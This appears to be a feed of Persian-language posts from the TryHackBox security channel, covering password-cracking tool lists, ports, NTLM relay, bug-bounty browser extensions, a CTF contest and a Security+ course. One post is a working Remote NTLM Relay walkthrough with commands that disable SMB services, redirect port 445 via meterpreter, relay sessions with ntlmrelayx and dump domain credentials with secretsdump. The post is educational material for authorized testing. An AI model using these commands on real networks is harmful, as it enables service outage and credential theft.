Try Hack Box

🛡 ماه آگاهی‌بخشی امنیت سایبری آغاز شد! اکتبر، ماه جهانی امنیت سایبری امروز ۷ اکتبر، پایان هفته اول این ماه مهم رو شاهد هستیم. 🗓 این ماه فرصتی است برای: • ارتقای فرهنگ امنیت سایبری • آموزش کارکنان ضد حملات فیشینگ • افزایش امنیت وبسایت‌ها و اپلیکیشن‌ها • پیشگیری از نفوذ هکرها 💡 نکته کلیدی: هر کسب‌وکاری - حتی کوچک - نیازمند: ✅ نیروی انسانی آگاه به امنیت سایبری ✅ حضور متخصصان امنیت سایبری در تیم ✅ آموزش مستابع ضد تهدیدات سایبری امنیت، هزینه نیست، سرمایه‌گذاری است! 🔒 ✍️نویسنده @TryHackBoxStory | The Chaos #امنیت_سایبری #آگاهی_سایبری #امنیت_داده‌ها #کسب‌وکار_امن #ماه_آگاهی_سایبری

🔑 ابزارهای امنیت رمزعبور - راهنمای آگاهی و دفاع 🛡 رمزعبورهای ضعیف و تکراری همچنان یکی از بزرگ‌ترین ریسک‌های امنیتی هستند! محققان امنیتی و تسترهای نفوذ در محیط‌های آزمایشگاهی و تست‌های مجاز از این ابزارها برای شناسایی آسیب‌پذیری‌ها استفاده می‌کنند. 🛠 ابزارهای رایج: • John the Ripper ابزار کلاسیک تست رمزعبور برای فرمت‌های مختلف • RainbowCrack استفاده از جدول رنگین‌کمان برای کرک سریع • Wfuzz فاز کردن برای پیدا کردن مسیرها و پارامترهای پنهان • Cain & Abel مجموعه ابزار بازیابی رمزعبور ویندوز (نسخه لگاسی) • THC Hydra تستر رمزعبور لاگین شبکه (SSH, FTP, RDP, HTTP) • Medusa تستر موازی و ماژولار رمزعبور • OphCrack ابزار کرک رمزعبور با استفاده از جدول رنگین‌کمان • L@phtCrack ابزار قدیمی اما قدرتمند تست رمزعبور • Aircrack-ng مجموعه ابزار امنیت شبکه‌های Wi-Fi • Brutus ابزار تست رمزعبور از راه دور 🛡 راهکارهای دفاعی: ✅ اجرای سیاست‌های قوی رمزعبور (طول مناسب، پیچیدگی، یکتایی) ✅ فعال‌سازی احراز هویت دو مرحله‌ای (MFA/2FA) ✅ حسابرسی منظم اعتبارنامه‌ها و حذف اکانت‌های قدیمی ✅ استفاده از مدیران رمزعبور برای کاهش استفاده تکراری ✅ مانیتورینگ نشت اطلاعات در فیدهای تهدیدات سایبری ✍️نویسنده @TryHackBox | The Chaos #PasswordSecurity #CyberSecurity #EthicalHacking

PASSWORD CRACKING TOOLS 🔐 سری ابزار های مفید برای شکستن پسورد ها (با هدف بررسی میزان امنیت آنها) ✍️نویسنده @TryHackBox | The Chaos

Secure and insecure ports ⚠️ پورت‌های ناامن (ارسال داده بدون رمزنگاری) ✅ پورت‌های امن (با رمزنگاری) -> پورت هایی که نام برده شده به صورت گسترده در حال استفاده اند و دانستن آنها میتواند شبکه شما را امن تر کند یا تست نفوذ شما را سریع تر به عمل برساند ✍️نویسنده @TryHackBox | The Chaos #CyberSecurity #Network #Ports

🔖 اصل قضیه: Remote NTLM Relay ⭕ امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده. اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه. برای exploiting باید چند مرحله ساده رو انجام بدیم. 💢 مرحله 1 > آماده‌ سازی سرور برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه: 1. غیرفعال‌سازی NetLogon:

   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):

   sc stop lanmanserver
   sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:

   sc stop lanmanworkstation
   sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست. بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه. پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم. 💢 مرحله 2 > تنظیم ماشین مهاجم روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:

proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:

portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید. 💢 مرحله 4 > Post-exploitation بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم. در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:

proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/SRV-ADMIN@10.201.126.30

چرا این وکتور کمتر رایجه؟ دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست: غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه. @TryHackBox #AD #NTLM #Attack

NTLM Relay Attack ? خیلی‌ها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست. اغلب این حملات یا با کمک Responder انجام می‌شن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست‌ های Broadcast هست که بعضی پروتکل‌ ها در شبکه‌ های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه. در حالت اول ما باید دسترسی به همون شبکه‌ای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان relay حساب یک کامپیوتر دامینی رو به‌دست می‌یاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده. @TryHackBox #NTLM #AD #Attack

NTLM Relay Attack ? خیلی‌ها اسم حملات NTLM Relay رو شنیدن، اما مثل اغلب حملات دیگه، برای اجرا شدن نیاز به برآورده شدن شرایط مشخصی هست. اغلب این حملات یا با کمک Responder انجام می‌شن که در این حالت کلید موفقیت وابسته به موفقیت Poisoning درخواست‌ های Broadcast هست که بعضی پروتکل‌ ها در شبکه‌ های ویندوزی ازشون استفاده میکنن یا از مکانیزم Coerce (اجبار به احراز هویت) استفاده میشه. در حالت اول ما باید دسترسی به همون شبکه‌ای که «قربانی» توشه داشته باشیم، و در حالت دوم امکان ری‌لفای حساب یک کامپیوتر دامینی رو به‌دست می‌یاریم که باز هم همیشه نتیجهٔ دلخواه رو نمیده. @TryHackBox #NTLM #AD #Attack

🚀 آغاز مرحله مقدماتی مسابقه BlueCup 🔵 در مرحله اول این رقابت، شرکت‌کنندگان با مجموعه‌ای از چالش‌های مربوط به شناسایی حملات روبه‌رو می‌شن. شروع مسیر با سوالاتی از حوزه پاسخگویی به رخداد خواهد بود و بعد از اون باید سراغ حل چالش‌های فنی برید. 🏆 نفرات برتر این مرحله به دور بعد راه پیدا می‌کنن و در قالب گروهی رقابت می‌کنن؛ رقابت‌ها تا فینال ادامه خواهد داشت و در نهایت برترین‌ها در قالبی متفاوت به مصاف هم میرن. 📅 تاریخ برگزاری: جمعه 18 مهر ⏰ زمان: 10 صبح تا 17 (7 ساعت) 📍 محل: بخش مسابقات در پروفایل کاربری Challenginno ⚡️ نکات مهم: برای شرکت در مسابقه نیازی به ثبت‌نام مجدد و پرداخت هزینه نیست. کاربرانی که هنوز ثبت‌نام نکرده‌اند، تا شروع مسابقه فرصت دارن حساب خودشون رو بسازن. سطح مسابقه: مقدماتی تا متوسط 🎁 جوایز نقدی: 🥇 نفر اول: 30 میلیون تومان 🥈 نفر دوم: 10 میلیون تومان (در فینال امکان انتخاب حالت Raise هم وجود داره که شرایط اون اعلام خواهد شد.) 🔗 همین حالا آماده شو و وارد رقابت BlueCup بشو! 🌐 https://challenginno.ir 🌐 https://t.me/challenginno

🛠 اکستنشن های کمکی برای تست نفوذ و امنیت وب 🔍 شناسایی تکنولوژی‌ها • Wappalyzer پروفایلر تکنولوژی - شناسایی CMS، فریمورک‌ها و کتابخانه‌های جاوااسکریپت 🎯 تست نفوذ و آنالیز • Hackbar افزونه تست نفوذ برای Chrome و Firefox • OWASP Penetration Testing Kit اسکن امنیتی برنامه‌های وب (DAST & SCA) • KNOXSS Community Edition ابزار کشف XSS 🔒 امنیت و اسکن آسیب‌پذیری • Retire.js اسکن کتابخانه‌های جاوااسکریپت آسیب‌پذیر • Trufflehog شناسایی خودکار API keys و credentials • DotGit تشخیص دایرکتوری‌های git در معرض دید • Bishop Vulnerability Scanner اسکنر سیستم‌های کنترل نسخه و ابزارهای ادمین 🌐 مدیریت درخواست‌ها و هدرها • FoxyProxy مدیریت آسان پروکسی سرور • Modheader تغییر هدرهای HTTP و URL • Request Maker ضبط، تغییر و ارسال درخواست‌های HTTP 🔎 جستجو و اوسینت • Shodan یافتن اطلاعات هاستینگ و پورت‌های باز • Hunter یافتن آدرس‌های ایمیل در وبسایت‌ها • Mitaka جستجوی IP، دامنه، URL و هش از طریق منو راست‌کلیک ⚡️ ابزارهای کمکی • Open Multiple URLs باز کردن چندین URL همزمان • Cookie-Editor مدیریت کوکی‌ها برای تب جاری • S3 Bucket List ثبت اکسپوز S3 buckets • d3coder انکود و دیکد متن (base64, rot13, ...) ✍️نویسنده @TryHackBox | The Chaos #BugBounty #Browser #Extension #Tools

Browser Extensions For Bug Bounty 🌐 سری اکستنشن های مفید برای باگ بانتی که داشتنشون در مرورگرتون میتونه کمک مفیدی به فعالیتتون بکنه ✍️نویسنده @TryHackBox | The Chaos

دوستانی که دوره سکوریتی پلاس مارو میگذرونند ، ما یک گروه ایجاد کردیم که فایل تمرینی یا اگر سوالی یا مشکلی داشتید بپرسید و فایل ها رو در اختیارتون قرار بدیم اگر مایل بودید به گروه بپیوندید به ما پیام دهید لینک گروه رو ارسال کنیم برای شما : @Unique_exploitbot

#جلسه_هفتم دوره #رایگان سکوریتی پلاس | Security + بخش : گواهی های دیجیتال دوره Security+ یک دوره معتبر و پایه‌ای در زمینه امنیت سایبری است که توسط CompTIA ارائه می‌شود. این دوره به شما مهارت‌های لازم برای شناسایی و مدیریت تهدیدات امنیتی و مقابله با حملات، پیاده‌سازی راهکارهای امنیتی،اصول رمزنگاری و درک اصول امنیت شبکه را آموزش می‌دهد. برای دیدن ویدئو روی لینک زیر کلیک کنید : https://youtu.be/4ZybmjvZSuY انتقادی داشتید حتما اطلاع بدید، تا بتونیم آموزش با کیفیت‌تری ارائه بدیم،امیدواریم از آموزش لذت ببرید. ---------- 🆔 @TryHackBox ----------